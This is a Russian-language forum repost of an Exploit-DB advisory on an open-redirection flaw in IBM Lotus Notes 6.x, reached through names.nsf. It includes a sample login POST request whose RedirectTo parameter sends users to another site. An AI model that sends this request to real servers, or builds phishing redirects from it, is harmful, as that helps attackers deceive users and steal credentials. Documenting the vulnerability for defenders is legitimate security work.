Exploit IBM Lotus Notes 6.5.6 - 'names.nsf' Open Redirection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
33774
Проверка EDB
  1. Пройдено
Автор
LAMENT
Тип уязвимости
REMOTE
Платформа
MULTIPLE
CVE
N/A
Дата публикации
2010-03-19
Код:
source: https://www.securityfocus.com/bid/38852/info

IBM Lotus Notes is prone to an open-redirection vulnerability because the application fails to properly sanitize user-supplied input.

A successful exploit may aid in phishing attacks; other attacks are possible.

Lotus Notes 6.x is vulnerable; other versions may also be affected. 

The following example POST data is available:

POST /names.nsf?Login HTTP/1.1

Connection: Keep-Alive

%25%25ModDate=xxxxxxxxxxxxxxxx&Username=yyyy+zzzz&Password=aaaaaa&RedirectTo=http://www.example.com&SaveOptions=0&...
 
Источник
www.exploit-db.com

Похожие темы